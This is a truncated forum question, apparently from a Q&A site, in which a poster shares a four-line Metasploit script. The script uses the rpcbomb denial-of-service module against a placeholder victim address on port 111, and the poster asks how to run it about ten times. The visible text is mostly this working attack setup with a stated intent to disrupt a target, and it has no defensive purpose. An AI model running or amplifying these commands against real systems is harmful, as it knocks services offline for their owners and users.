How to run a meterpreter script multiple times
I have this very simple script to run a rpcbomb script from auxiliary/dos/rpc/rpcbomb for a DOS attack.
use auxiliary/dos/rpc/rpcbomb
set RHOSTS Victim_IP_Address
set RPORT 111
exploit -j -z
I want to run the script about 10 times but I c… Continue reading How to run a meterpreter script multiple times